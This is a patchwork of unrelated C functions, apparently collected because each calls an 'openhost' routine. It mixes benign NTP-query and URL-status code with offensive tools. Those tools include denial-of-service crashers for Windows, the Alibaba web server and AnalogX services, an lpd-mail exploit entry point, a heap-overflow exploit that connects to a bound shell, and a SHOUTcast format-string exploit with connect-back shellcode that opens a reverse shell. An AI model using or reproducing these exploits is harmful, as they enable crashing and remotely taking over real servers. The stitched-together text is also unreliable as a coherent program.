main(int argc, char *argv[]) { int sock,i; if (argc<3) { printf("\n\t\tCJB Ip Forwarding client by wC (version 1.0b)\n\n"); printf("Sintaxe: %s <username> <password> [url (offline)]\n",argv[0]); printf("Send flamez to [email protected], Enjoy...\n\n"); } else if (argc==3) { printf("CJB Ip Forwarding client by wC (version 1.0b)\n\n"); printf("Connecting to server... (%s)\n",server); sock=openhost(server,port); if (sock!=-1) { sprintf(buf,"GET %s?username=%s&password=%s\n",cgiscript,argv[1],argv[2]); sends(sock,buf); close(sock); printf("Done...%s.cjb.net is now forwarding to your ip!\n\n",argv[1]); } else printf("\nCould not connect to server :/\n\n"); } else { printf("CJB Ip Forwarding Client by wC (version 1.0b)\n\n"); printf("Connecting to server... (%s)\n",server); sock=openhost(server,port); if (sock!=-1) { sprintf(buf,"GET %s?username=%s&password=%s&url=%s\n",cgiscript,argv[1],argv[2],argv[3]); sends(sock,buf); close(sock); printf("Account: %s.cjb.net\n",argv[1]); printf("Forwarding to: %s\n",argv[3]); printf("Done!\n\n"); } else printf("\nCould not connect to server :/\n\n"); } }
void attack(char *host, int port) { int sock,i; char *buf; printf("\n\tDos Attack against any windows version (95/98 TESTED) by wildcoyote\n\n"); printf("Trying to connect to %s (%d)....(please wait)\n",host,port); sock=openhost(host,port); if(sock<=0) { printf("- Could not connect -\n"); printf("Exiting...\n\n"); exit(-1); } else printf("Connected to %s (%d)\n",host,port); buf = (char *) malloc(260); strcpy(buf,"GET /command."); for(i=0;i<240;i++) strcat(buf,"A"); strcat(buf,"\n"); printf("Oh k! Sending a 240'char (extension) filename request to host...\n"); sends(sock,buf); close(sock); free(buf); printf("Crash sent! The host *probably* crashed :P\n"); printf("Send flamez to [email protected], *Enjoy*...\n\n"); }
void DoS(char *host, int port) { int sock,i; char *buf; printf("\nDoS against Alibaba 2.0 WebServer by wildcoyote\n\n"); printf("Trying to connect to %s (%d)....(please wait)\n",host,port); sock=openhost(host,port); if(sock<=0) { printf("- Could not connect -\n"); printf("Exiting...\n\n"); exit(-1); } else printf("Connected to %s (%d)\n",host,port); printf("Allocating memory for DoS\n"); buf = (char *) malloc(8200); // it takes 8173 bytes, but i wave mem ;) strcpy(buf,"GET "); for(i=5;i<8198;i++) strcat(buf,"A"); strcat(buf,"\n\n"); printf("Oh k! Sending CRASH!\n"); sends(sock,buf); close(sock); free(buf); printf("Crash sent! The host *probably* crashed :P\n"); printf("Send flamez to [email protected], *Enjoy*...\n\n"); }
int ntpq_openhost(char *hostname) { if ( openhost(hostname) ) { numhosts = 1; } else { numhosts = 0; } return numhosts; }
void analogXcrash(char *host, int type) { char *buf; int sock, i, x, buffer_size; printf("Type Number: %d\n",type); printf("Service : %s\n",analogXDoS_types[type].service); printf("Port : %d\n",analogXDoS_types[type].port); printf("Let the show begin ladyes...\n"); printf("Connecting to %s [%d]...",host,analogXDoS_types[type].port); sock=openhost(host,analogXDoS_types[type].port); if (sock==-1) { printf("FAILED!\n"); printf("Couldnt connect...leaving :|\n\n"); exit(-1); } printf("SUCCESS!\n"); printf("Allocating memory for buffer..."); buffer_size=(strlen(analogXDoS_types[type].command) + analogXDoS_types[type].overflow_string_size); if (!(buf=malloc(buffer_size))) { printf("FAILED!\n"); printf("Leaving... :[\n\n"); exit(-1); } printf("WORKED! (heh)\n"); for(i=0;;i++) if ((analogXDoS_types[type].command[i]=='B') && (analogXDoS_types[type].command[i+1]=='O')) break; else buf[i]=analogXDoS_types[type].command[i]; for(x=0;x<analogXDoS_types[type].overflow_string_size;x++) strcat(buf,"X"); i+=2; for(;i<strlen(analogXDoS_types[type].command);i++) buf[strlen(buf)]=analogXDoS_types[type].command[i]; printf("Sending EVIL buffer ;)\n"); sends(sock,buf); close(sock); printf("Heh...that host should be a gonner by now ;)\n"); printf("Was it good for you to? :)\n\n"); }
/* * host - set the host we are dealing with. */ static void host( struct parse *pcmd, FILE *fp ) { int i; if (pcmd->nargs == 0) { if (havehost) (void) fprintf(fp, "current host is %s\n", currenthost); else (void) fprintf(fp, "no current host\n"); return; } i = 0; if (pcmd->nargs == 2) { if (!strcmp("-4", pcmd->argval[i].string)) ai_fam_templ = AF_INET; else if (!strcmp("-6", pcmd->argval[i].string)) ai_fam_templ = AF_INET6; else { if (havehost) (void) fprintf(fp, "current host remains %s\n", currenthost); else (void) fprintf(fp, "still no current host\n"); return; } i = 1; } if (openhost(pcmd->argval[i].string)) { (void) fprintf(fp, "current host set to %s\n", currenthost); } else { if (havehost) (void) fprintf(fp, "current host remains %s\n", currenthost); else (void) fprintf(fp, "still no current host\n"); } }
int main (int argc, char*argv[]) { int port,sock; char *target,*printer,*user,*userhost; port = 0; target = printer = user = userhost = NULL; fprintf(stderr,"'lpd-mail.c' - Gus'98 with mods by Gamma\n"); if (argc < 5) usage(argv[0]); printf("Start !!!!!!!!!!!!\n"); target = argv[1]; printer = argv[2]; user = argv[3]; userhost = argv[4]; if ((sock = openhost(target)) > 0) { exit(doit(sock,printer,target,user,userhost)); } else { exit(sock); } }
void doit(char *host, int port, char *inputfile) { char buf[1024]; FILE *f; int s, i; s = openhost(host, port); if (s < 0) { printf("Couldn't connect.\n"); return; } f = fopen(inputfile, "r"); assert(f); for (;;) { fgets(buf, 1024, f); if (feof(f)) break; SSL_write(ssl, buf, strlen(buf)); } SSL_write(ssl, buf, strlen(buf)); /* Eat the rest of the page */ while (i = SSL_read(ssl, buf, 1024)) { buf[i] = NULL; printf(buf); fflush(stdout); } close(s); SSL_free(ssl); SSL_CTX_free(ctx); return; }
/* * main - parse arguments and handle options */ int ntpdcmain( int argc, char *argv[] ) { extern int ntp_optind; delay_time.l_ui = 0; delay_time.l_uf = DEFDELAY; #ifdef SYS_VXWORKS clear_globals(); taskPrioritySet(taskIdSelf(), 100 ); #endif init_lib(); /* sets up ipv4_works, ipv6_works */ ssl_applink(); /* Check to see if we have IPv6. Otherwise default to IPv4 */ if (!ipv6_works) ai_fam_default = AF_INET; progname = argv[0]; { int optct = ntpOptionProcess(&ntpdcOptions, argc, argv); argc -= optct; argv += optct; } if (HAVE_OPT(IPV4)) ai_fam_templ = AF_INET; else if (HAVE_OPT(IPV6)) ai_fam_templ = AF_INET6; else ai_fam_templ = ai_fam_default; if (HAVE_OPT(COMMAND)) { int cmdct = STACKCT_OPT( COMMAND ); const char** cmds = STACKLST_OPT( COMMAND ); while (cmdct-- > 0) { ADDCMD(*cmds++); } } debug = DESC(DEBUG_LEVEL).optOccCt; if (HAVE_OPT(INTERACTIVE)) { interactive = 1; } if (HAVE_OPT(NUMERIC)) { showhostnames = 0; } if (HAVE_OPT(LISTPEERS)) { ADDCMD("listpeers"); } if (HAVE_OPT(PEERS)) { ADDCMD("peers"); } if (HAVE_OPT(SHOWPEERS)) { ADDCMD("dmpeers"); } if (ntp_optind == argc) { ADDHOST(DEFHOST); } else { for (; ntp_optind < argc; ntp_optind++) ADDHOST(argv[ntp_optind]); } if (numcmds == 0 && interactive == 0 && isatty(fileno(stdin)) && isatty(fileno(stderr))) { interactive = 1; } #if 0 ai_fam_templ = ai_fam_default; while ((c = ntp_getopt(argc, argv, "46c:dilnps")) != EOF) switch (c) { case '4': ai_fam_templ = AF_INET; break; case '6': ai_fam_templ = AF_INET6; break; case 'c': ADDCMD(ntp_optarg); break; case 'd': ++debug; break; case 'i': interactive = 1; break; case 'l': ADDCMD("listpeers"); break; case 'n': showhostnames = 0; break; case 'p': ADDCMD("peers"); break; case 's': ADDCMD("dmpeers"); break; default: errflg++; break; } if (errflg) { (void) fprintf(stderr, "usage: %s [-46dilnps] [-c cmd] host ...\n", progname); exit(2); } if (ntp_optind == argc) { ADDHOST(DEFHOST); } else { for (; ntp_optind < argc; ntp_optind++) ADDHOST(argv[ntp_optind]); } if (numcmds == 0 && interactive == 0 && isatty(fileno(stdin)) && isatty(fileno(stderr))) { interactive = 1; } #endif #ifndef SYS_WINNT /* Under NT cannot handle SIGINT, WIN32 spawns a handler */ if (interactive) (void) signal_no_reset(SIGINT, abortcmd); #endif /* SYS_WINNT */ /* * Initialize the packet data buffer */ pktdatasize = INITDATASIZE; pktdata = emalloc(INITDATASIZE); if (numcmds == 0) { (void) openhost(chosts[0]); getcmds(); } else { int ihost; int icmd; for (ihost = 0; ihost < numhosts; ihost++) { if (openhost(chosts[ihost])) for (icmd = 0; icmd < numcmds; icmd++) { if (numhosts > 1) printf ("--- %s ---\n",chosts[ihost]); docmd(ccmds[icmd]); } } } #ifdef SYS_WINNT WSACleanup(); #endif return(0); } /* main end */
int exploit(char *host, int port, int type) { char sendbuf[500]; char buffer[377]; int i=0; int sock2; sock=openhost(host, port); if (sock==-1) { fprintf(stderr,"Unable to connect.\n\n"); exit(1); } fprintf(stdout, "Attacking (%s) ...\n", host); memset(buffer, 0xbf, sizeof(buffer) - 1); for(i=0;i<376;i=i+4) { buffer[i] = 0xbf; /* must be a valid pointer */ buffer[i+1] = 0xff; buffer[i+2] = 0xb0; buffer[i+3] = 0xef; } memcpy(buffer, shellcode, strlen(shellcode)); buffer[359] = 0xff; /* prev_size */ buffer[360] = 0xff; buffer[361] = 0xff; buffer[362] = 0xff; buffer[363] = 0xfc; /* size field */ buffer[364] = 0xff; buffer[365] = 0xff; buffer[366] = 0xff; buffer[368] = (targets[type - 1].retloc & 0x000000ff); /* FD */ buffer[369] = (targets[type - 1].retloc & 0x0000ff00) >> 8; buffer[370] = (targets[type - 1].retloc & 0x00ff0000) >> 16; buffer[371] = (targets[type - 1].retloc & 0xff000000) >> 24; buffer[372] = (targets[type - 1].ret & 0x000000ff); /* BK */ buffer[373] = (targets[type - 1].ret & 0x0000ff00) >> 8; buffer[374] = (targets[type - 1].ret & 0x00ff0000) >> 16; buffer[375] = (targets[type - 1].ret & 0xff000000) >> 24; buffer[376] = 0x0; snprintf(sendbuf, sizeof(sendbuf) -1, "POST / HTTP/1.0\n" "Content-Length: -800\n" "\n\n%s\n",buffer); write(sock, sendbuf, strlen(sendbuf)); sleep(4); close(sock); sock=openhost(host, 30464); if (sock==-1) { fprintf(stderr,"Failed.\n\n"); exit(1); } fprintf(stdout, "Exploit successful!\n"); fprintf(stdout, "------------------------------------------------------------------\n"); shell(sock); close(sock); return 0; }
/* * Accept a url string, return a struct status. * * A negative status indicates a problem either connecting to the * machine, or a url parse problem. The message will tell you what, * specifically happened (although it doesn't distinguish between a * timeout, and a connection refused). */ struct status getstatus(char *url) { int i; char line[1024]; char *p, *q; struct url u; struct status st; struct host_ret conn; st.status = -1; st.message = NULL; st.bytesread = 0; u = parseurl(url); if (u.port == -1) { st.message = strdup("Invalid url request format"); return (st); } conn = openhost(u.host, u.port, u.ssl); if (conn.s < 0) { st.message = strdup("Could not connect to host"); return (st); } send_data(conn, u, "GET "); send_data(conn, u, u.req); send_data(conn, u, " HTTP/1.0\n\n"); alarm(120); i = recv_data(conn, u, line, 1024); alarm(0); if (i < 1) { st.message = strdup("Timeout, or nothing returned."); return (st); } line[i] = NULL; /* * My keen parsing techniques, flip through it with a pointer * to get the status number */ p = &line[0]; while (*p++ && *p != ' '); st.status = atoi(p); /* Now we want the status message */ while (*++p && *p != ' '); /* Kill Whitey */ q = p; while (*++q && !iswhitey(*q)); *q = NULL; st.message = strdup(p + 1); /* Eat the rest of the page */ while (recv_data(conn, u, line, 1024)); #ifdef USE_SSLEAY if (u.ssl) { if (conn.ssl) SSL_free(conn.ssl); if (conn.ctx) SSL_CTX_free(conn.ctx); } #endif close(conn.s); freeurl(u); return (st); }
int main (int argc,char *argv[]) { char buf1[512]; char buf2[512]; char host[256]; char pass[256]="changeme"; char data; int type= 0; int c=0; int port=8001; char devices[256] = "ppp0"; unsigned char *ptr; struct hostent *hp; struct sockaddr_in sin_listener; struct ifreq ifr; struct timeval timeout; fd_set fdread; int delay = 12; int i = 0; int mode = 0; int local_port = 0; int opt = 0; int ret = 0; int sin_len = sizeof (struct sockaddr_in); int sock = 0; int sock2 = 0; int sockd = 0; int listener = 0; int time_out = 4; int tmp = 0; srand(getpid()); fprintf(stdout,"SHOUTcast v1.9.4 remote exploit by exworm of 0seen\n"); fprintf(stdout,"--------------------------------------------------(www.oseen.org)\n"); while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF) { switch(c) { case 'p': port=atoi(optarg); if ((port <= 0) || (port > 65535)) { fprintf(stderr,"Invalid port.\n\n"); exit(1); } break; case 'a': memset(devices,0x0,sizeof(devices)); strncpy(devices,optarg,sizeof(devices) - 1); break; case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 28) { for(i = 0; i < sizeof(targets) / 28; i++) fprintf(stderr, "%02d. %s - %s [0x%08x - 0x%08x]\n", i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].eax); return -1; } break; case 'h': memset(host,0x0,sizeof(host)); strncpy(host,optarg,sizeof(host) - 1); break; default: usage(argv[0]); exit(1); break; } } timeout.tv_sec = time_out; timeout.tv_usec = 0; if (strlen(host) == 0) { usage(argv[0]); exit(1); } sock=openhost(host, port); if (sock==-1) { fprintf(stderr,"- Unable to connect.\n\n"); exit(1); } strncpy(ifr.ifr_name, devices, 15); if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) { fprintf(stderr, "socket() error.\n"); return -1; } if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { fprintf(stderr, "socket() error.\n"); return -1; } ptr = get_my_ip_addr(sockd, &ifr); memcpy(&sin_listener.sin_addr.s_addr, ptr, 4); sin_listener.sin_family = AF_INET; memset(&sin_listener.sin_zero, 0x00, 8); while(1) { local_port = local_port = 45295; sin_listener.sin_port = htons(local_port); if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break; } listen(listener, 1); fprintf(stdout, "[+] lisntener...\n"); linux_connect_back[129] = (unsigned int) *(ptr + 0); linux_connect_back[130] = (unsigned int) *(ptr + 1); linux_connect_back[131] = (unsigned int) *(ptr + 2); linux_connect_back[132] = (unsigned int) *(ptr + 3); char req[1024] = "GET /content/DD" "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD" "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; strcat(req, "DD.mp3 HTTP/1.0\r\n\r\n"); char req1[1024] = "GET /content/AA" /* sprintf GOT addr */ "\x3c\x49\x06\x08\x3d\x49\x06\x08\x3e\x49\x06\x08\x3f\x49\x06\x08"; strcat(req1, linux_connect_back); strcat(req1, ".mp3 HTTP/1.0\r\n\r\n"); char *req2 = "GET /content/%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAA-%n-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n.mp3" " /HTTP/1.0\r\n\r\n"; printf("[*] Sending first request ...\n"); write(sock, req1, strlen(req1)); close(sock); sock=openhost(host, 8000); if (sock==-1) { fprintf(stderr,"- Unable to connect.\n\n"); exit(1); } printf("[*] Sending second request ...\n"); while(1) { write(sock, req2, strlen(req2)); sleep(2); FD_ZERO(&fdread); FD_SET(listener, &fdread); timeout.tv_sec = time_out; timeout.tv_usec = 0; while(1) { ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout); if (ret < 0) { close(sock); close(listener); fprintf(stderr, "select() error.\n"); return -1; } if (ret == 0) { fprintf(stderr, "[+] Failed, waiting %d seconds.\n" "[+] Use ctrl-c to abort.\n", delay); sleep(delay); break; } if(FD_ISSET(listener, &fdread)) { sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len); close(sock); close(listener); fprintf(stderr, "[+] ownedbyOseen!\n" "-----------------------------------------------------------\n"); shell(sock2); close(sock2); return 0; } } } fprintf(stderr, "[+] Exploit failed.\n"); close(listener); close(sock); return 0; }